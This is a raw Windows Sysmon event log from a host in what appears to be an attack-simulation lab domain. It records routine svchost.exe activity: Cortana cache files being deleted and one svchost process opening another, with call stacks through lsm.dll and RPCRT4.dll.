23542300x80000000000000005201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\Apps.ftMD5=F256707B0901454854702BF58E4DEF0B,SHA256=2603EF3B568C277FF92E75593C0969A0E24291BBC9419080B77D567A53825ED1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\Apps.dataMD5=09924E1BACD1740F5906D89DD6905D99,SHA256=98C574D4894041260AB499048E2B5CB9F58A58AA42B5DDFAE9C44D2BEEA9023D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\0.2.filtertrie.intermediate.txtMD5=C204E9FAAF8565AD333828BEFF2D786E,SHA256=D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\0.1.filtertrie.intermediate.txtMD5=34BD1DFB9F72CF4F86E6DF6DA0A9E49A,SHA256=8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\0.0.filtertrie.intermediate.txtMD5=F975464F45E06A57B8FE3C4FFE644599,SHA256=41B65982C681DAFBA517CEA1878436C4FE1500C161A00B9A916661DB425D5FB0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.616{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{FEEDCB9B-F3C5-495B-A8D7-84F79D27D88E}MD5=9FCDA9AF0663B95421B2DF4DF2E1B9D4,SHA256=B3003B1A6220FA0F3390E2F297DFA4209C45C3D8FB9B55ABBA2507792720A89C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{FE283CE6-7678-4BF6-BD45-D855B6683130}MD5=3E30C6D0FC6DB0EE27A19FCF25DF566B,SHA256=EA12C2CD052FE46441BCC9C4FB81D9D52C1FEE3AEE762C09EB2FE34D19B1D2A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E79AFC5E-81E0-48C0-B2B8-B0755C4E824D}MD5=8571A37EA5341C6306283678D6D7B3F7,SHA256=DA51B889B504FE15B3526AA6A87A4A9843989F4EB6D32CFB205861A223030B21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E46F3460-B4C6-40F2-9BF2-B4D9A4F6ED86}MD5=DB04268CDC55A7FE26A2F145F86BF875,SHA256=CFACBA24A15CFB163790F9C67CDB2B2CC82CE006B9E32AC8687DBFC7DB69B258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.601{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E28967A0-A00F-44F4-BEB5-D1DC1F682F91}MD5=D073912E2B55F885ADC380FB3849A88D,SHA256=3D6632DD180019CC415F024A5C0724886E4F5E90116E78F5B390E09475C8A1C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{E1C5F6E0-5D96-4432-9C54-B630B005F17D}MD5=A220E6F69189C7C262EA46B8EE8E6FE4,SHA256=556020DC6EFBDBF8054FAEEE15519516CBF2B11904D5AF9E04D041D7480BCA58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.585{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{DE7873BF-B56F-4465-AA14-AD810677CFF1}MD5=5E62597AD6E77746796E3B8571490D14,SHA256=45FB70B917C807BEFD513465866C4D27A4E869DA31182CDCF6D314DF224EB651,IMPHASH=00000000000000000000000000000000falsetrue 